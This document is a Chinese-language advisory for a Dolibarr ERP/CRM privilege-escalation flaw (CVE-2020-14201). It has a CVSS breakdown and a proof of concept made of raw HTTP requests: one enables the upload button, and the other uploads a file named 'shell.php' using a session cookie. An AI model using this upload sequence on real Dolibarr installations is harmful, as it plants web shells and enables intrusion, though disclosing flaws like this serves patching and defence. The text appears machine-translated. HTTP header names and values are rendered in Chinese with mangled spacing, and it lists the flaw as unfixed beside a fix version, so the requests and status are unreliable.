| 厂商 |  |
| 产品 | Dolibarr |
| 受影响的版本 | 11.0.4及之前版本 |
| 测试版本 | 11.0.4和5.0.3 |
| 漏洞发现日期 | 2020-6-12 |
| 厂商通知日期 | 2020-6-12 |
| 预警公告日期 | 2020-6-12【无技术细节】 |
| 厂商修复日期 | 版本11.0.5 |
| 公开披露日期 | 2020-8-21 |
| 最新修正日期 | 2020-8-21 |
| CVE ID | CVE-2020-14201 |
| 产品描述 | Dolibarr ERP / CRM是一个开源的免费软件包,适用于中小型企业,基金会或自由职业者。它包括企业资源规划(ERP)和客户关系管理(CRM)的不同功能,还包括不同活动的其他功能。 |
| 发现者 | Krzysztof Bednarski,高级网络安全顾问和渗透测试人员@wizlynx group |
漏洞描述
| 特权升级漏洞 | |||
| 严重程度: 中 | CVSS 分数: 4.3 | CWE-ID: CWE-269 | 状态: 未修复 |
| 漏洞详情 | |||
| Dolibarr 11.0.4及更早版本(11.0.4和5.0.3)受权限升级漏洞的影响。这些漏洞可能允许经过身份验证的远程攻击者上载任意文件。 | |||
| CVSS基准分 | |||
| 攻击媒介 | 网络 | 范围 | 不变 |
| 攻击复杂度 | 低 | 保密性影响 | 无 |
| 所需特权 | 低 | 一致性影响 | 低 |
| 用户互动 | 不需要 | 可用性影响 | 无 |
详情
Dolibarr受到特权提升漏洞的影响,允许无限制地上传文件。对应用程序中允许存储文件的任何方式(第三方等)具有读取访问权限的任何用户都可以将任意文件上传。
POC
例如:
|
GET /dolibarr/societe/document.php?socid=1 HTTP / 1.1 主机:XXXXX:9999 用户代理:Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv:77.0)Gecko / 20100101 Firefox / 77.0 接受:文本/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language:en-GB,en; q = 0.5 Accept-Encoding:gzip,deflate DNT: 1 连接:关闭 引荐来源:http:// XXXXX:9999 / dolibarr / societe / document.php?socid = 1&mainmenu = home Cookie:DOLSESSID_620db380f9c409549b47dfbf632cd5af = 2bmei5he3te4bj1vt0s7rf11e6 升级-不安全请求:1 |
以下屏幕截图显示了原始代码:
以下屏幕截图显示了原始响应:
以下屏幕截图显示了原始响应:
这启用了上传按钮,并允许用户上传文件:
请求:
|
POST /dolibarr/societe/document.php?id=1 HTTP / 1.1 主机:XXXXX:9999 用户代理:Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv:77.0)Gecko / 20100101 Firefox / 77.0 接受:文本/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language:en-GB,en; q = 0.5 Accept-Encoding:gzip,deflate Content-类型:multipart / form-data;boundary = --------------------------- 5985013784170980668253576010 内容长度:1450 来源:http:// XXXXX:9999 DNT:1 连接:关闭 引用网址:http:// XXXXX:9999 / dolibarr / societe / document.php?socid = 1 Cookie:DOLSESSID_620db380f9c409549b47dfbf632cd5af = 2bmei5he3te4bj1vt0s7rf11e6 升级-不安全请求:1 ----------------------------- 5985013784170980668253576010 Content-Disposition:表单数据;name =“ token” $ 2y $ 10 $ vAM5N6BUEEcTEjxUUX / jTO38LX4Cj5rX3mtnhTOoOs1yTsbdRLzz2 ----------------------------- 5985013784170980668253576010 内容处置:表单数据;name =“ section_dir” ----------------------------- 5985013784170980668253576010 Content-Disposition:表单数据;name =“ section_id” 0 ----------------------------- 5985013784170980668253576010 Content-Disposition:表单数据;name =“ sortfield” ----------------------------- 5985013784170980668253576010 Content-Disposition:表单数据;name =“ sortorder” ----------------------------- 5985013784170980668253576010 内容处置:表单数据;name =“ max_file_size” 2097152 ----------------------------- 5985013784170980668253576010 Content-Disposition:表单数据;name =“ userfile []”; filename =“ shell.php” 内容类型:application / octet-stream
----------------------------- 5985013784170980668253576010 Content-Disposition:表单数据;name =“ sendit” 上传 ----------------------------- 5985013784170980668253576010-- |
这导致文件被上传:
